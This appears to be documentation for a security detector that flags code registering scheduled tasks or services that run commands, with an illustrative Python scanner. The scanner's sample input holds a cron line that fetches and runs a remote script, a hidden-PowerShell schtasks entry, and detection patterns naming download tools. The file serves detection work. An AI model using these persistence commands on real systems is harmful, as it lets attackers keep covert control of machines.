Suspicious scheduled system service

ID

suspicious_scheduled_system_service

Severity

high

Resource

System

Tags

worm

Description

This detector looks for code that registers a suspicious system service or scheduled task: a scheduling call (the scheduled_task source) whose action reaches a command-execution sink, which is the pattern malware uses to have a payload re-run at boot or on an interval.

Rationale

Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When an operating system boots, it starts processes that perform background system functions. On Windows these are called services; on Linux they are called services or daemons.

Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.

Configuration

The detector has the following configurable parameters:

  • sources, which lists the source kinds to check. Available values are:

    • scheduled_task

  • sinks, which lists the sink kinds to check. Available values are:

    • command_injection

  • neutralizations, which lists the neutralization kinds to check. By default this is empty: no neutralizer is trusted to sanitize a flow, because code that schedules a service is assumed to be potentially malicious rather than merely buggy.
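As an added illustration of the source/sink/neutralization model described above (this is example code written for this page, not the detector's own rule set or engine), the Python scanner below walks a constructed sample script line by line, matches scheduled_task sources (crontab, schtasks, sc, systemctl, launchctl registrations) against command_injection sinks (interpreter launches and remote fetches inside the scheduled action), and suppresses a hit only when a caller-supplied neutralization regex matches. The regexes, the `Finding` type and the sample script are this example's assumptions.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

DETECTOR_ID = "suspicious_scheduled_system_service"
SEVERITY = "high"

# Source kinds: ways a program registers something to run at boot or on a schedule.
# Only "scheduled_task" is documented for the detector; these regexes are an
# illustrative approximation, not the detector's real rules.
SOURCE_KINDS = {
    "scheduled_task": [
        (r"\bschtasks(?:\.exe)?\b.*?/create\b", "windows schtasks /create"),
        (r"\bsc(?:\.exe)?\s+create\b", "windows sc create"),
        (r"\bcrontab\b", "unix crontab"),
        (r"\bsystemctl\b.*?\benable\b", "systemd enable"),
        (r"\blaunchctl\b.*?\bload\b", "launchd load"),
    ],
}

# Sink kinds: what makes the scheduled action dangerous, namely handing control
# to a shell/interpreter or pulling code from the network.
SINK_KINDS = {
    "command_injection": [
        (r"\b(?:sh|bash|zsh|cmd(?:\.exe)?|powershell(?:\.exe)?|pwsh|wscript|cscript|mshta)\b",
         "interpreter launch"),
        (r"\b(?:curl|wget|certutil|Invoke-WebRequest|bitsadmin)\b", "remote fetch"),
    ],
}


@dataclass(frozen=True)
class Finding:
    line: int
    source: str
    sink: str
    text: str


def scan(source_text: str,
         sources: Iterable[str] = ("scheduled_task",),
         sinks: Iterable[str] = ("command_injection",),
         neutralizations: Iterable[str] = ()) -> List[Finding]:
    """Report lines where a scheduled-task registration (source) carries an
    action that reaches a command-execution sink.

    neutralizations are regexes that, when matched on the line, suppress the
    finding. The default is empty, mirroring the detector's default of
    trusting no neutralizer for potentially malicious code."""
    src_rules = [rule for kind in sources for rule in SOURCE_KINDS[kind]]
    sink_rules = [rule for kind in sinks for rule in SINK_KINDS[kind]]
    neutralizers = [re.compile(pat) for pat in neutralizations]
    findings: List[Finding] = []
    for lineno, line in enumerate(source_text.splitlines(), start=1):
        source = next((label for pat, label in src_rules if re.search(pat, line)), None)
        if source is None:
            continue  # nothing is being scheduled on this line
        sink = next((label for pat, label in sink_rules if re.search(pat, line)), None)
        if sink is None:
            continue  # scheduled, but the action is not a command/fetch
        if any(n.search(line) for n in neutralizers):
            continue  # explicitly neutralized by configuration
        findings.append(Finding(lineno, source, sink, line.strip()))
    return findings


# Constructed sample input: two persistence attempts plus two benign calls.
SAMPLE_SOURCE = r"""import os, subprocess
# legitimate log rotation helper
subprocess.run(["logrotate", "/etc/logrotate.conf"])
# persistence via cron: fetch and run a remote script every minute
os.system('(crontab -l; echo "* * * * * curl -s http://198.51.100.7/p.sh | sh") | crontab -')
# persistence via a Windows scheduled task that launches a hidden PowerShell
subprocess.call('schtasks /create /sc onlogon /tn Updater /tr "powershell -w hidden -File C:\Users\Public\u.ps1"', shell=True)
# benign: enabling a systemd unit shipped with the package
subprocess.run(["systemctl", "enable", "myapp.service"])
"""


def report(findings: List[Finding]) -> List[str]:
    """Render findings in the detector's id/severity vocabulary."""
    return [f"{DETECTOR_ID} [{SEVERITY}] line {f.line}: {f.source} -> {f.sink}: {f.text}"
            for f in findings]


if __name__ == "__main__":
    for row in report(scan(SAMPLE_SOURCE)):
        print(row)
```

With the default (empty) neutralizations the scanner flags the crontab line and the schtasks line and leaves the logrotate and systemctl calls alone, since their scheduled action never reaches an interpreter or a download; supplying a neutralization regex such as the payload host suppresses the matching finding, which is exactly why the detector ships with that list empty.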

This technique is widespread across malicious code, so the list below is not exhaustive; it names some well-known families that use it:

  • RATs and their loaders, such as RATDispenser, which is used to gain an initial foothold on a system before launching the secondary malware that establishes control over the compromised device.

    Its shellcode gains persistence by scheduling services on the system.